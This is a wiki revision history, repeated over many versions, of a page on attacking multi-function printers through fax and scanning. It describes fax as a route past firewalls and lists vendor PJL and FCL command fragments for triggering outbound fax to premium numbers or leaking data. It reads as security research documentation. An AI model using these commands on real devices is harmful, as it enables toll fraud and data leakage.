printers or MFPs in internal networks. In the middle of 90s Adobe introduced ‘PostScript fax’ as a language supplement <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 18-35</ref>, allowing compatible devices to receive PostScript files directly via fax. This enables an attacker to use ordinary telephone system as a channel to deploy malicious PostScript code to a printer. Unfortunately, PostScript fax never established itself and was only implemented in a handful of devices. Telefax messages instead are typically transmitted as graphical images like TIFF. Nevertheless, it cannot be ruled out that other vendors implement proprietary fax extensions to '''inbound''' receive arbitrary PDL datastreams instead of raw fax images. Theoretically, a ‘fax virus’ could be created which would spread by infecting other devices based on numbers from the MFPs's address book or by traditional wardialing. Furthermore, '''outbound''' fax can often be controlled by proprietary PJL commands on today's MFPs. This can be used to cause financial loss to an institution by calling an 0900 number (which may be registered by the attacker herself) or as a backchannel to leak sensitive information. Examples are given below (mostly untested). === HP === According to [http://hplipopensource.com] fax can be accessed using PML on HP devices. === Xerox === According to [http://www.office.xerox.com/support/dctips/dc02cc0280.pdf], Xerox uses proprietary PJL commands: <code>@PJL COMMENT OID_ATT_FAX_DESTINATION_PHONE "..."</code> === Brother === According to [http://brother-mfc.sourceforge.net/faxlanguage.txt], Brother uses the proprietary FCL (Fax Control Language): <code><Esc>DIALNUM[ (...) ]</code> === Lexmark === According to [https://www.lexmark.com/publications/pdfs/techref_WB.pdf] Lexmark uses proprietary PJL commands: <code>@PJL LFAX PHONENUMBER="..."</code> === Kyocera === According to [http://material.karlov.mff.cuni.cz/people/hajek/bizhub/femperonpsc200mu.pl] Kyocera uses proprietary PJL commands: <code>@PJL SET FAXTEL = ...</code> === Ricoh === Accroding to [http://www.objectiflune.com/forum2/ubbthreads.php?ubb=showflat&Number=29462&page=1] Ricoh uses proprietary PJL commands: <code>@PJL ENTER LANGUAGE=RFAX</code> == Scanner == Access to scan functionality on MFPs is not standardized and it seems only few vendors apply PJL commands for this task. Public documentation is missing, the [http://www.sane-project.org/sane-backends.html#SCANNERS SANE project] managed to reverse engineer the protocols for various scanner devices. On Brother MFPs, the proprietary PostScript operator '''_brpdfscan''' may possibly be used. 1194fd40573b71a6e68011ab06701b01f5d8d921 43 42 2017-01-05T11:21:47Z 77.181.97.62 0 wikitext text/x-wiki While single function printers are still common there is clearly a trend towards multi-function printers/peripherals (MFP), also referred to as multi-function devices (MFD) or all-in-one (AiO) devices, which have additional built-in functions like scanning and/or telefax. == Telefax == Fax messages are transmitted in the form of audio-frequency tones. They can be sent to any telefax-capable device available over the telephone system. Therefore, they could potentially be used to bypass typical company protection mechanisms like TCP/IP firewalls or intrusion detection systems and execute malicious commands on printers or MFPs in internal networks. In the middle of 90s Adobe introduced ‘PostScript fax’ as a language supplement <ref>Adobe Systems Inc., ''PostScript Language Reference Manual Supplement for Version 2016'', (1995), 18-35.</ref>, allowing compatible devices to receive PostScript files directly via fax. This enables an attacker to use ordinary telephone system as a channel to deploy malicious PostScript code to a printer. Unfortunately, PostScript fax never established itself and was only implemented in a handful of devices. Telefax messages instead are typically transmitted as graphical images like TIFF. Nevertheless, it cannot be ruled out that other vendors implement proprietary fax extensions to '''inbound''' receive arbitrary PDL datastreams instead of raw fax images. Theoretically, a ‘fax virus’ could be created which would spread by infecting other devices based on numbers from the MFPs's address book or by traditional wardialing. Furthermore, '''outbound''' fax can often be controlled by proprietary PJL commands on today's MFPs. This can be used to cause financial loss to an institution by calling an 0900 number (which may be registered by the attacker herself) or as a backchannel to leak sensitive information. Examples are given below (mostly untested). === HP === According to [http://hplipopensource.com] fax can be accessed using PML on HP devices. === Xerox === According to [http://www.office.xerox.com/support/dctips/dc02cc0280.pdf], Xerox uses proprietary PJL commands: <code>@PJL COMMENT OID_ATT_FAX_DESTINATION_PHONE "..."</code> === Brother === According to [http://brother-mfc.sourceforge.net/faxlanguage.txt], Brother uses the proprietary FCL (Fax Control Language): <code><Esc>DIALNUM[ (...) ]</code> === Lexmark === According to [https://www.lexmark.com/publications/pdfs/techref_WB.pdf] Lexmark uses proprietary PJL commands: <code>@PJL LFAX PHONENUMBER="..."</code> === Kyocera === According to [http://material.karlov.mff.cuni.cz/people/hajek/bizhub/femperonpsc200mu.pl] Kyocera uses proprietary PJL commands: <code>@PJL SET FAXTEL = ...</code> === Ricoh === Accroding to [http://www.objectiflune.com/forum2/ubbthreads.php?ubb=showflat&Number=29462&page=1] Ricoh uses proprietary PJL commands: <code>@PJL ENTER LANGUAGE=RFAX</code> == Scanner == Access to scan functionality on MFPs is not standardized and it seems only few vendors apply PJL commands for this task. Public documentation is missing, the [http://www.sane-project.org/sane-backends.html#SCANNERS SANE project] managed to reverse engineer the protocols for various scanner devices. On Brother MFPs, the proprietary PostScript operator '''_brpdfscan''' may possibly be used. dbeddc77253d54280ef54750f341cf197b84ce16 42 41 2017-01-05T11:21:30Z 77.181.97.62 0 wikitext text/x-wiki While single function printers are still common there is clearly a trend towards multi-function printers/peripherals (MFP), also referred to as multi-function devices (MFD) or all-in-one (AiO) devices, which have additional built-in functions like scanning and/or telefax. == Telefax == Fax messages are transmitted in the form of audio-frequency tones. They can be sent to any telefax-capable device available over the telephone system. Therefore, they could potentially be used to bypass typical company protection mechanisms like TCP/IP firewalls or intrusion detection systems and execute malicious commands on printers or MFPs in internal networks. In the middle of 90s Adobe introduced ‘PostScript fax’ as a language supplement <ref>Adobe Systems Inc., ''PostScript Language Reference Manual Supplement for Version 2016'', (1995), 18-35.</ref>, allowing compatible devices to receive PostScript files directly via fax. This enables an attacker to use ordinary telephone system as a channel to deploy malicious PostScript code to a printer. Unfortunately, PostScript fax never established itself and was only implemented in a handful of devices. Telefax messages instead are typically transmitted as graphical images like TIFF. Nevertheless, it cannot be ruled out that other vendors implement proprietary fax extensions to '''inbound''' receive arbitrary PDL datastreams instead of raw fax images. Theoretically, a ‘fax virus’ could be created which would spread by infecting other devices based on numbers from the MFPs's address book or by traditional wardialing. Furthermore, '''outbound''' fax can often be controlled by proprietary PJL commands on today's MFPs. This can be used to cause financial loss to an institution by calling an 0900 number (which may be registered by the attacker herself) or as a backchannel to leak sensitive information. Examples are given below (mostly untested). === HP === According to [http://hplipopensource.com] fax can be accessed using PML on HP devices. === Xerox === According to [http://www.office.xerox.com/support/dctips/dc02cc0280.pdf], Xerox uses proprietary PJL commands: <code>@PJL COMMENT OID_ATT_FAX_DESTINATION_PHONE "..."</code> === Brother === According to [http://brother-mfc.sourceforge.net/faxlanguage.txt], Brother uses the proprietary FCL (Fax Control Language): <code><Esc>DIALNUM[ (...) ]</code> === Lexmark === According to [https://www.lexmark.com/publications/pdfs/techref_WB.pdf] Lexmark uses proprietary PJL commands: <code>@PJL LFAX PHONENUMBER="..."</code> === Kyocera === According to [http://material.karlov.mff.cuni.cz/people/hajek/bizhub/femperonpsc200mu.pl] Kyocera uses proprietary PJL commands: <code>@PJL SET FAXTEL = ...</code> === Ricoh === Accroding to [http://www.objectiflune.com/forum2/ubbthreads.php?ubb=showflat&Number=29462&page=1] Ricoh uses proprietary PJL commands: <code>@PJL ENTER LANGUAGE=RFAX</code> == Scanner == Access to scan functionality on MFPs is not standardized and it seems only few vendors apply PJL commands for this task. Public documentation is missing, the [http://www.sane-project.org/sane-backends.html#SCANNERS SANE project] managed to reverse engineer the protocols for various scanner devices. On Brother devices, the proprietary PostScript operator '''_brpdfscan''' may possibly be used. 2589bace73cf6b4aef9d4a7161ca4700114ae8f1 41 40 2017-01-05T11:21:14Z 77.181.97.62 0 wikitext text/x-wiki While single function printers are still common there is clearly a trend towards multi-function printers/peripherals (MFP), also referred to as multi-function devices (MFD) or all-in-one (AiO) devices, which have additional built-in functions like scanning and/or telefax. == Telefax == Fax messages are transmitted in the form of audio-frequency tones. They can be sent to any telefax-capable device available over the telephone system. Therefore, they could potentially be used to bypass typical company protection mechanisms like TCP/IP firewalls or intrusion detection systems and execute malicious commands on printers or MFPs in internal networks. In the middle of 90s Adobe introduced ‘PostScript fax’ as a language supplement <ref>Adobe Systems Inc., ''PostScript Language Reference Manual Supplement for Version 2016'', (1995), 18-35.</ref>, allowing compatible devices to receive PostScript files directly via fax. This enables an attacker to use ordinary telephone system as a channel to deploy malicious PostScript code to a printer. Unfortunately, PostScript fax never established itself and was only implemented in a handful of devices. Telefax messages instead are typically transmitted as graphical images like TIFF. Nevertheless, it cannot be ruled out that other vendors implement proprietary fax extensions to '''inbound''' receive arbitrary PDL datastreams instead of raw fax images. Theoretically, a ‘fax virus’ could be created which would spread by infecting other devices based on numbers from the MFPs's address book or by traditional wardialing. Furthermore, '''outbound''' fax can often be controlled by proprietary PJL commands on today's MFPs. This can be used to cause financial loss to an institution by calling an 0900 number (which may be registered by the attacker herself) or as a backchannel to leak sensitive information. Examples are given below (mostly untested). === HP === According to [http://hplipopensource.com] fax can be accessed using PML on HP devices. === Xerox === According to [http://www.office.xerox.com/support/dctips/dc02cc0280.pdf], Xerox uses proprietary PJL commands: <code>@PJL COMMENT OID_ATT_FAX_DESTINATION_PHONE "..."</code> === Brother === According to [http://brother-mfc.sourceforge.net/faxlanguage.txt], Brother uses the proprietary FCL (Fax Control Language): <code><Esc>DIALNUM[ (...) ]</code> === Lexmark === According to [https://www.lexmark.com/publications/pdfs/techref_WB.pdf] Lexmark uses proprietary PJL commands: <code>@PJL LFAX PHONENUMBER="..."</code> === Kyocera === According to [http://material.karlov.mff.cuni.cz/people/hajek/bizhub/femperonpsc200mu.pl] Kyocera uses proprietary PJL commands: <code>@PJL SET FAXTEL = ...</code> === Ricoh === Accroding to [http://www.objectiflune.com/forum2/ubbthreads.php?ubb=showflat&Number=29462&page=1] Ricoh uses proprietary PJL commands: <code>@PJL ENTER LANGUAGE=RFAX</code> == Scanner == Access to scan functionality on MFPs is not standardized and it seems only few vendors apply PJL commands for this task. Public documentation is missing, the [http://www.sane-project.org/sane-backends.html#SCANNERS SANE project] managed to reverse engineer various scanner devices. On Brother devices, the proprietary PostScript operator '''_brpdfscan''' may possibly be used. d6baa6ef80129fb8b974a2bbaf727473c926d0bf 40 39 2017-01-05T11:20:36Z 77.181.97.62 0 wikitext text/x-wiki While single function printers are still common there is clearly a trend towards multi-function printers/peripherals (MFP), also referred to as multi-function devices (MFD) or all-in-one (AiO) devices, which have additional built-in functions like scanning and/or telefax. == Telefax == Fax messages are transmitted in the form of audio-frequency tones. They can be sent to any telefax-capable device available over the telephone system. Therefore, they could potentially be used to bypass typical company protection mechanisms like TCP/IP firewalls or intrusion detection systems and execute malicious commands on printers or MFPs in internal networks. In the middle of 90s Adobe introduced ‘PostScript fax’ as a language supplement <ref>Adobe Systems Inc., ''PostScript Language Reference Manual Supplement for Version 2016'', (1995), 18-35.</ref>, allowing compatible devices to receive PostScript files directly via fax. This enables an attacker to use ordinary telephone system as a channel to deploy malicious PostScript code to a printer. Unfortunately, PostScript fax never established itself and was only implemented in a handful of devices. Telefax messages instead are typically transmitted as graphical images like TIFF. Nevertheless, it cannot be ruled out that other vendors implement proprietary fax extensions to '''inbound''' receive arbitrary PDL datastreams instead of raw fax images. Theoretically, a ‘fax virus’ could be created which would spread by infecting other devices based on numbers from the MFPs's address book or by traditional wardialing. Furthermore, '''outbound''' fax can often be controlled by proprietary PJL commands on today's MFPs. This can be used to cause financial loss to an institution by calling an 0900 number (which may be registered by the attacker herself) or as a backchannel to leak sensitive information. Examples are given below (mostly untested). === HP === According to [http://hplipopensource.com] fax can be accessed using PML on HP devices. === Xerox === According to [http://www.office.xerox.com/support/dctips/dc02cc0280.pdf], Xerox uses proprietary PJL commands: <code>@PJL COMMENT OID_ATT_FAX_DESTINATION_PHONE "..."</code> === Brother === According to [http://brother-mfc.sourceforge.net/faxlanguage.txt], Brother uses the proprietary FCL (Fax Control Language): <code><Esc>DIALNUM[ (...) ]</code> === Lexmark === According to [https://www.lexmark.com/publications/pdfs/techref_WB.pdf] Lexmark uses proprietary PJL commands: <code>@PJL LFAX PHONENUMBER="..."</code> === Kyocera === According to [http://material.karlov.mff.cuni.cz/people/hajek/bizhub/femperonpsc200mu.pl] Kyocera uses proprietary PJL commands: <code>@PJL SET FAXTEL = ...</code> === Ricoh === Accroding to [http://www.objectiflune.com/forum2/ubbthreads.php?ubb=showflat&Number=29462&page=1] Ricoh uses proprietary PJL commands: <code>@PJL ENTER LANGUAGE=RFAX</code> == Scanner == Access to scan functionality on MFPs is not standardized and it seems only few vendors apply PJL commands for this task. Public documentation is missing, the [http://www.sane-project.org/sane-backends.html#SCANNERS SANE project] has done an amazing job on reverse engineering various scanners. On Brother devices, the proprietary PostScript operator '''_brpdfscan''' may possibly be used. 105ff858a110815aba7b9de1cde34f5ba05f7e5c 39 38 2017-01-05T11:20:04Z 77.181.97.62 0 wikitext text/x-wiki While single function printers are still common there is clearly a trend towards multi-function printers/peripherals (MFP), also referred to as multi-function devices (MFD) or all-in-one (AiO) devices, which have additional built-in functions like scanning and/or telefax. == Telefax == Fax messages are transmitted in the form of audio-frequency tones. They can be sent to any telefax-capable device available over the telephone system. Therefore, they could potentially be used to bypass typical company protection mechanisms like TCP/IP firewalls or intrusion detection systems and execute malicious commands on printers or MFPs in internal networks. In the middle of 90s Adobe introduced ‘PostScript fax’ as a language supplement <ref>Adobe Systems Inc., ''PostScript Language Reference Manual Supplement for Version 2016'', (1995), 18-35.</ref>, allowing compatible devices to receive PostScript files directly via fax. This enables an attacker to use ordinary telephone system as a channel to deploy malicious PostScript code to a printer. Unfortunately, PostScript fax never established itself and was only implemented in a handful of devices. Telefax messages instead are typically transmitted as graphical images like TIFF. Nevertheless, it cannot be ruled out that other vendors implement proprietary fax extensions to '''inbound''' receive arbitrary PDL datastreams instead of raw fax images. Theoretically, a ‘fax virus’ could be created which would spread by infecting other devices based on numbers from the MFPs's address book or by traditional wardialing. Furthermore, '''outbound''' fax can often be controlled by proprietary PJL commands on today's MFPs. This can be used to cause financial loss to an institution by calling an 0900 number (which may be registered by the attacker herself) or as a backchannel to leak sensitive information. Examples are given below (mostly untested). === HP === According to [http://hplipopensource.com] fax can be accessed using PML on HP devices. === Xerox === According to [http://www.office.xerox.com/support/dctips/dc02cc0280.pdf], Xerox uses proprietary PJL commands: <code>@PJL COMMENT OID_ATT_FAX_DESTINATION_PHONE "..."</code> === Brother === According to [http://brother-mfc.sourceforge.net/faxlanguage.txt], Brother uses the proprietary FCL (Fax Control Language): <code><Esc>DIALNUM[ (...) ]</code> === Lexmark === According to [https://www.lexmark.com/publications/pdfs/techref_WB.pdf] Lexmark uses proprietary PJL commands: <code>@PJL LFAX PHONENUMBER="..."</code> === Kyocera === According to [http://material.karlov.mff.cuni.cz/people/hajek/bizhub/femperonpsc200mu.pl] Kyocera uses proprietary PJL commands: <code>@PJL SET FAXTEL = ...</code> === Ricoh === Accroding to [http://www.objectiflune.com/forum2/ubbthreads.php?ubb=showflat&Number=29462&page=1] Ricoh uses proprietary PJL commands: <code>@PJL ENTER LANGUAGE=RFAX</code> == Scanner == Access to scan functionality on MFPs is not standardized and it seems only few vendors apply PJL commands for this task. Public documentation is missing, the [http://www.sane-project.org/sane-backends.html#SCANNERS SANE project] has done an amazing job reverse engineering various scanners. On Brother devices, the proprietary PostScript operator '''_brpdfscan''' may possibly be used. 4ec1ac8cfcf7e6a9dc94a8ce85450a6132ca5219 38 37 2017-01-05T11:19:11Z 77.181.97.62 0 wikitext text/x-wiki While single function printers are still common there is clearly a trend towards multi-function printers/peripherals (MFP), also referred to as multi-function devices (MFD) or all-in-one (AiO) devices, which have additional built-in functions like scanning and/or telefax. == Telefax == Fax messages are transmitted in the form of audio-frequency tones. They can be sent to any telefax-capable device available over the telephone system. Therefore, they could potentially be used to bypass typical company protection mechanisms like TCP/IP firewalls or intrusion detection systems and execute malicious commands on printers or MFPs in internal networks. In the middle of 90s Adobe introduced ‘PostScript fax’ as a language supplement <ref>Adobe Systems Inc., ''PostScript Language Reference Manual Supplement for Version 2016'', (1995), 18-35.</ref>, allowing compatible devices to receive PostScript files directly via fax. This enables an attacker to use ordinary telephone system as a channel to deploy malicious PostScript code to a printer. Unfortunately, PostScript fax never established itself and was only implemented in a handful of devices. Telefax messages instead are typically transmitted as graphical images like TIFF. Nevertheless, it cannot be ruled out that other vendors implement proprietary fax extensions to '''inbound''' receive arbitrary PDL datastreams instead of raw fax images. Theoretically, a ‘fax virus’ could be created which would spread by infecting other devices based on numbers from the MFPs's address book or by traditional wardialing. Furthermore, '''outbound''' fax can often be controlled by proprietary PJL commands on today's MFPs. This can be used to cause financial loss to an institution by calling an 0900 number (which may be registered by the attacker herself) or as a backchannel to leak sensitive information. Examples are given below (mostly untested). === HP === According to [http://hplipopensource.com] fax can be accessed using PML on HP devices. === Xerox === According to [http://www.office.xerox.com/support/dctips/dc02cc0280.pdf], Xerox uses proprietary PJL commands: <code>@PJL COMMENT OID_ATT_FAX_DESTINATION_PHONE "..."</code> === Brother === According to [http://brother-mfc.sourceforge.net/faxlanguage.txt], Brother uses the proprietary FCL (Fax Control Language): <code><Esc>DIALNUM[ (...) ]</code> === Lexmark === According to [https://www.lexmark.com/publications/pdfs/techref_WB.pdf] Lexmark uses proprietary PJL commands: <code>@PJL LFAX PHONENUMBER="..."</code> === Kyocera === According to [http://material.karlov.mff.cuni.cz/people/hajek/bizhub/femperonpsc200mu.pl] Kyocera uses proprietary PJL commands: <code>@PJL SET FAXTEL = ...</code> === Ricoh === Accroding to [http://www.objectiflune.com/forum2/ubbthreads.php?ubb=showflat&Number=29462&page=1] Ricoh uses proprietary PJL commands: <code>@PJL ENTER LANGUAGE=RFAX</code> == Scanner == Access to scan functionality on MFPs is not standardized and it seems only few vendors apply PJL commands for this task. Public documentation is missing, the [http://www.sane-project.org/sane-backends.html#SCANNERS SANE project] has reverse engineered some scanners. On Brother devices, the proprietary PostScript operator '''_brpdfscan''' may possibly be used. 521a7d031dc1464ddbf808c2eed92b3d3b5eaab3 37 36 2017-01-05T11:18:59Z 77.181.97.62 0 wikitext text/x-wiki While single function printers are still common there is clearly a trend towards multi-function printers/peripherals (MFP), also referred to as multi-function devices (MFD) or all-in-one (AiO) devices, which have additional built-in functions like scanning and/or telefax. == Telefax == Fax messages are transmitted in the form of audio-frequency tones. They can be sent to any telefax-capable device available over the telephone system. Therefore, they could potentially be used to bypass typical company protection mechanisms like TCP/IP firewalls or intrusion detection systems and execute malicious commands on printers or MFPs in internal networks. In the middle of 90s Adobe introduced ‘PostScript fax’ as a language supplement <ref>Adobe Systems Inc., ''PostScript Language Reference Manual Supplement for Version 2016'', (1995), 18-35.</ref>, allowing compatible devices to receive PostScript files directly via fax. This enables an attacker to use ordinary telephone system as a channel to deploy malicious PostScript code to a printer. Unfortunately, PostScript fax never established itself and was only implemented in a handful of devices. Telefax messages instead are typically transmitted as graphical images like TIFF. Nevertheless, it cannot be ruled out that other vendors implement proprietary fax extensions to '''inbound''' receive arbitrary PDL datastreams instead of raw fax images. Theoretically, a ‘fax virus’ could be created which would spread by infecting other devices based on numbers from the MFPs's address book or by traditional wardialing. Furthermore, '''outbound''' fax can often be controlled by proprietary PJL commands on today's MFPs. This can be used to cause financial loss to an institution by calling an 0900 number (which may be registered by the attacker herself) or as a backchannel to leak sensitive information. Examples are given below (mostly untested). === HP === According to [http://hplipopensource.com] fax can be accessed using PML on HP devices. === Xerox === According to [http://www.office.xerox.com/support/dctips/dc02cc0280.pdf], Xerox uses proprietary PJL commands: <code>@PJL COMMENT OID_ATT_FAX_DESTINATION_PHONE "..."</code> === Brother === According to [http://brother-mfc.sourceforge.net/faxlanguage.txt], Brother uses the proprietary FCL (Fax Control Language): <code><Esc>DIALNUM[ (...) ]</code> === Lexmark === According to [https://www.lexmark.com/publications/pdfs/techref_WB.pdf] Lexmark uses proprietary PJL commands: <code>@PJL LFAX PHONENUMBER="..."</code> === Kyocera === According to [http://material.karlov.mff.cuni.cz/people/hajek/bizhub/femperonpsc200mu.pl] Kyocera uses proprietary PJL commands: <code>@PJL SET FAXTEL = ...</code> === Ricoh === Accroding to [http://www.objectiflune.com/forum2/ubbthreads.php?ubb=showflat&Number=29462&page=1] Ricoh uses proprietary PJL commands: <code>@PJL ENTER LANGUAGE=RFAX</code> == Scanners == Access to scan functionality on MFPs is not standardized and it seems only few vendors apply PJL commands for this task. Public documentation is missing, the [http://www.sane-project.org/sane-backends.html#SCANNERS SANE project] has reverse engineered some scanners. On Brother devices, the proprietary PostScript operator '''_brpdfscan''' may possibly be used. c2f27d09b607be65ba00bd3cb5114471b5fe64b8 36 35 2017-01-05T11:18:09Z 77.181.97.62 0 wikitext text/x-wiki While single function printers are still common there is clearly a trend towards multi-function printers/peripherals (MFP), also referred to as multi-function devices (MFD) or all-in-one (AiO) devices, which have additional built-in functions like scanning and/or telefax. == Telefax == Fax messages are transmitted in the form of audio-frequency tones. They can be sent to any telefax-capable device available over the telephone system. Therefore, they could potentially be used to bypass typical company protection mechanisms like TCP/IP firewalls or intrusion detection systems and execute malicious commands on printers or MFPs in internal networks. In the middle of 90s Adobe introduced ‘PostScript fax’ as a language supplement <ref>Adobe Systems Inc., ''PostScript Language Reference Manual Supplement for Version 2016'', (1995), 18-35.</ref>, allowing compatible devices to receive PostScript files directly via fax. This enables an attacker to use ordinary telephone system as a channel to deploy malicious PostScript code to a printer. Unfortunately, PostScript fax never established itself and was only implemented in a handful of devices. Telefax messages instead are typically transmitted as graphical images like TIFF. Nevertheless, it cannot be ruled out that other vendors implement proprietary fax extensions to '''inbound''' receive arbitrary PDL datastreams instead of raw fax images. Theoretically, a ‘fax virus’ could be created which would spread by infecting other devices based on numbers from the MFPs's address book or by traditional wardialing. Furthermore, '''outbound''' fax can often be controlled by proprietary PJL commands on today's MFPs. This can be used to cause financial loss to an institution by calling an 0900 number (which may be registered by the attacker herself) or as a backchannel to leak sensitive information. Examples are given below (mostly untested). === HP === According to [http://hplipopensource.com] fax can be accessed using PML on HP devices. === Xerox === According to [http://www.office.xerox.com/support/dctips/dc02cc0280.pdf], Xerox uses proprietary PJL commands: <code>@PJL COMMENT OID_ATT_FAX_DESTINATION_PHONE "..."</code> === Brother === According to [http://brother-mfc.sourceforge.net/faxlanguage.txt], Brother uses the proprietary FCL (Fax Control Language): <code><Esc>DIALNUM[ (...) ]</code> === Lexmark === According to [https://www.lexmark.com/publications/pdfs/techref_WB.pdf] Lexmark uses proprietary PJL commands: <code>@PJL LFAX PHONENUMBER="..."</code> === Kyocera === According to [http://material.karlov.mff.cuni.cz/people/hajek/bizhub/femperonpsc200mu.pl] Kyocera uses proprietary PJL commands: <code>@PJL SET FAXTEL = ...</code> === Ricoh === Accroding to [http://www.objectiflune.com/forum2/ubbthreads.php?ubb=showflat&Number=29462&page=1] Ricoh uses proprietary PJL commands: <code>@PJL ENTER LANGUAGE=RFAX</code> == Scanner == Access to scan functionality on MFPs is not standardized and it seems only few vendors apply PJL commands for this task. Public documentation is missing, the [http://www.sane-project.org/sane-backends.html#SCANNERS SANE project] has reverse engineered some scanners. On Brother devices, the proprietary PostScript operator '''_brpdfscan''' may possibly be used. 521a7d031dc1464ddbf808c2eed92b3d3b5eaab3 35 34 2017-01-05T11:17:39Z 77.181.97.62 0 wikitext text/x-wiki While single function printers are still common there is clearly a trend towards multi-function printers/peripherals (MFP), also referred to as multi-function devices (MFD) or all-in-one (AiO) devices, which have additional built-in functions like scanning and/or telefax. == Telefax == Fax messages are transmitted in the form of audio-frequency tones. They can be sent to any telefax-capable device available over the telephone system. Therefore, they could potentially be used to bypass typical company protection mechanisms like TCP/IP firewalls or intrusion detection systems and execute malicious commands on printers or MFPs in internal networks. In the middle of 90s Adobe introduced ‘PostScript fax’ as a language supplement <ref>Adobe Systems Inc., ''PostScript Language Reference Manual Supplement for Version 2016'', (1995), 18-35.</ref>, allowing compatible devices to '''inbound''' receive PostScript files directly via fax. This enables an attacker to use ordinary telephone system as a channel to deploy malicious PostScript code to a printer. Unfortunately, PostScript fax never established itself and was only implemented in a handful of devices. Telefax messages instead are typically transmitted as graphical images like TIFF. Nevertheless, it cannot be ruled out that other vendors implement proprietary fax extensions to receive arbitrary PDL datastreams instead of raw fax images. Theoretically, a ‘fax virus’ could be created which would spread by infecting other devices based on numbers from the MFPs's address book or by traditional wardialing. Furthermore, '''outbound''' fax can often be controlled by proprietary PJL commands on today's MFPs. This can be used to cause financial loss to an institution by calling an 0900 number (which may be registered by the attacker herself) or as a backchannel to leak sensitive information. Examples are given below (mostly untested). === HP === According to [http://hplipopensource.com] fax can be accessed using PML on HP devices. === Xerox === According to [http://www.office.xerox.com/support/dctips/dc02cc0280.pdf], Xerox uses proprietary PJL commands: <code>@PJL COMMENT OID_ATT_FAX_DESTINATION_PHONE "..."</code> === Brother === According to [http://brother-mfc.sourceforge.net/faxlanguage.txt], Brother uses the proprietary FCL (Fax Control Language): <code><Esc>DIALNUM[ (...) ]</code> === Lexmark === According to [https://www.lexmark.com/publications/pdfs/techref_WB.pdf] Lexmark uses proprietary PJL commands: <code>@PJL LFAX PHONENUMBER="..."</code> === Kyocera === According to [http://material.karlov.mff.cuni.cz/people/hajek/bizhub/femperonpsc200mu.pl] Kyocera uses proprietary PJL commands: <code>@PJL SET FAXTEL = ...</code> === Ricoh === Accroding to [http://www.objectiflune.com/forum2/ubbthreads.php?ubb=showflat&Number=29462&page=1] Ricoh uses proprietary PJL commands: <code>@PJL ENTER LANGUAGE=RFAX</code> == Scanner == Access to scan functionality on MFPs is not standardized and it seems only few vendors apply PJL commands for this task. Public documentation is missing, the [http://www.sane-project.org/sane-backends.html#SCANNERS SANE project] has reverse engineered some scanners. On Brother devices, the proprietary PostScript operator '''_brpdfscan''' may possibly be used. 8a9824be184d131e9597607ac03ae35c4f4d4411 34 33 2017-01-05T11:16:30Z 77.181.97.62 0 wikitext text/x-wiki While single function printers are still common there is clearly a trend towards multi-function printers/peripherals (MFP), also referred to as multi-function devices (MFD) or all-in-one (AiO) devices, which have additional built-in functions like scanning and/or telefax. == Telefax == Fax messages are transmitted in the form of audio-frequency tones. They can be sent to any telefax-capable device available over the telephone system. Therefore, they could potentially be used to bypass typical company protection mechanisms like TCP/IP firewalls or intrusion detection systems and execute malicious commands on printers or MFPs in internal networks. In the middle of 90s Adobe introduced ‘PostScript fax’ as a language supplement <ref>Adobe Systems Inc., ''PostScript Language Reference Manual Supplement for Version 2016'', (1995), 18-35.</ref>, allowing compatible devices to '''inbound''' receive PostScript files directly via fax. This enables an attacker to use ordinary telephone system as a channel to deploy malicious PostScript code to a printer. Unfortunately, PostScript fax never established itself and was only implemented in a handful of devices. Telefax messages are nowadays typically transmitted as graphical images like TIFF. Nevertheless, it cannot be ruled out that other vendors implement proprietary fax extensions to receive arbitrary PDL datastreams instead of raw fax images. Theoretically, a ‘fax virus’ could be created which would spread by infecting other devices based on numbers from the MFPs's address book or by traditional wardialing. Furthermore, '''outbound''' fax can often be controlled by proprietary PJL commands on today's MFPs. This can be used to cause financial loss to an institution by calling an 0900 number (which may be registered by the attacker herself) or as a backchannel to leak sensitive information. Examples are given below (mostly untested). === HP === According to [http://hplipopensource.com] fax can be accessed using PML on HP devices. === Xerox === According to [http://www.office.xerox.com/support/dctips/dc02cc0280.pdf], Xerox uses proprietary PJL commands: <code>@PJL COMMENT OID_ATT_FAX_DESTINATION_PHONE "..."</code> === Brother === According to [http://brother-mfc.sourceforge.net/faxlanguage.txt], Brother uses the proprietary FCL (Fax Control Language): <code><Esc>DIALNUM[ (...) ]</code> === Lexmark === According to [https://www.lexmark.com/publications/pdfs/techref_WB.pdf] Lexmark uses proprietary PJL commands: <code>@PJL LFAX PHONENUMBER="..."</code> === Kyocera === According to [http://material.karlov.mff.cuni.cz/people/hajek/bizhub/femperonpsc200mu.pl] Kyocera uses proprietary PJL commands: <code>@PJL SET FAXTEL = ...</code> === Ricoh === Accroding to [http://www.objectiflune.com/forum2/ubbthreads.php?ubb=showflat&Number=29462&page=1] Ricoh uses proprietary PJL commands: <code>@PJL ENTER LANGUAGE=RFAX</code> == Scanner == Access to scan functionality on MFPs is not standardized and it seems only few vendors apply PJL commands for this task. Public documentation is missing, the [http://www.sane-project.org/sane-backends.html#SCANNERS SANE project] has reverse engineered some scanners. On Brother devices, the proprietary PostScript operator '''_brpdfscan''' may possibly be used. db717428d92d608bb304a8f32bebea2a4e8ee888 33 2017-01-05T11:15:38Z 77.181.97.62 0 Created page with "While single function printers are still common there is clearly a trend towards multi-function printers/peripherals (MFP), also referred to as multi-function devices (MFD) or..." wikitext text/x-wiki While single function printers are still common there is clearly a trend towards multi-function printers/peripherals (MFP), also referred to as multi-function devices (MFD) or all-in-one (AiO) devices, which have additional built-in functions like scanning and/or telefax. == Telefax == Telefax messages are transmitted in the form of audio-frequency tones. They can be sent to any telefax-capable device available over the telephone system. Therefore, they could potentially be used to bypass typical company protection mechanisms like TCP/IP firewalls or intrusion detection systems and execute malicious commands on printers or MFPs in internal networks. In the middle of 90s Adobe introduced ‘PostScript fax’ as a language supplement <ref>Adobe Systems Inc., ''PostScript Language Reference Manual Supplement for Version 2016'', (1995), 18-35.</ref>, allowing compatible devices to '''inbound''' receive PostScript files directly via fax. This enables an attacker to use ordinary telephone system as a channel to deploy malicious PostScript code to a printer. Unfortunately, PostScript fax never established itself and was only implemented in a handful of devices. Telefax messages are nowadays typically transmitted as graphical images like TIFF. Nevertheless, it cannot be ruled out that other vendors implement proprietary fax extensions to receive arbitrary PDL datastreams instead of raw fax images. Theoretically, a ‘fax virus’ could be created which would spread by infecting other devices based on numbers from the MFPs's address book or by traditional wardialing. Furthermore, '''outbound''' fax can often be controlled by proprietary PJL commands on today's MFPs. This can be used to cause financial loss to an institution by calling an 0900 number (which may be registered by the attacker herself) or as a backchannel to 